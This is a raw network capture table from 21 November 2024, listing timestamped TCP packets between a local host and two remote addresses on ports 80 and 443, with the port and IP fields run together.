                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.390305996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.390366077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.391274929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.391335011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.391412020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.391468048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.392349958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.392402887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.392407894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.392460108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.393454075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.393507957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.393572092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.393630981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394535065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394561052 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394601107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394668102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394723892 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394795895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394944906 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394944906 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.394944906 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.395649910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.395730972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.395798922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.395865917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.396827936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.396883011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.396903992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.396938086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.397804022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.397881985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.397910118 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.397921085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.397949934 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.398032904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.398061991 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.398216963 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.398242950 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.398967028 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.399030924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.399091005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.399147987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.400055885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.400115967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.400161982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.400217056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.401196957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.401252031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.401257038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.401307106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.402229071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.402290106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.402343035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.402399063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.403338909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.403389931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.403397083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.403439999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.404371023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.404428959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.404483080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.404537916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.405464888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.405523062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.405555010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.405606985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.406543970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.406595945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.406599045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.406650066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.407646894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.407715082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.407752037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.407808065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.408744097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.408807039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.408855915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.408910990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.409836054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.409904957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.409970045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.410026073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.410926104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.410983086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.411036968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.411092997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.412014008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.412072897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.412138939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.412194967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.413077116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.413129091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.413194895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.413249016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.414165974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.414226055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.414288044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.414344072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.415242910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.415297031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.415302992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.415353060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.416342974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.416403055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.416467905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.416523933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.417411089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.417469025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.417532921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.417589903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.418508053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.418567896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.418632030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.418689966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.419626951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.419687986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.419744015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.419799089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.420692921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.420751095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.420777082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.420826912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.421824932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.421885967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.421951056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.422009945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.422872066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.422930956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.422979116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.423034906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.423949003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.424007893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.424088955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.424145937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.425041914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.425096989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.425141096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.425198078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.426110983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.426172972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.426260948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.426320076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.427246094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.427306890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.427485943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.427542925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.428236008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.428296089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.509293079 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.509365082 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.509480953 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.509737015 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.509783030 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.509813070 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.509829044 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.513099909 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.513176918 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.513278008 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.513498068 CET49789443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.513514042 CET4434978913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.581602097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.581733942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.581862926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.581890106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.581923962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.581954002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.582009077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.582977057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.583050013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.583096981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.583153963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.584072113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.584131956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.584170103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.584227085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.585131884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.585194111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.585258961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.585314989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.586215973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.586333036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.586397886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.587301970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.587384939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.587450027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.587512970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.588407993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.588478088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.588507891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.588572025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.589524031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.589634895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.589715958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.590580940 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.590662003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.590666056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.590727091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.591691971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.591769934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.591784000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.591842890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.592761993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.592869043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.592964888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.593852997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.593926907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.593969107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.594022989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.595108986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.595169067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.595272064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.595336914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.596188068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.596242905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.596251011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.596296072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.597106934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.597224951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.597285032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.598243952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.598301888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.598349094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.598404884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.598534107 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.598601103 CET4434978513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.599611998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.599708080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.599778891 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.599778891 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.599778891 CET49785443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.599853992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.600400925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.600469112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.600517035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.600574017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.601481915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.601588964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.601670027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.602611065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.602698088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.602720976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.602776051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.602893114 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.602936983 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.603655100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.603756905 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.603774071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.603806019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.603827000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.604017973 CET49790443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.604063034 CET4434979013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.604743958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.604863882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.604928970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.605938911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.605993032 CET804977031.41.244.11192.168.2.4
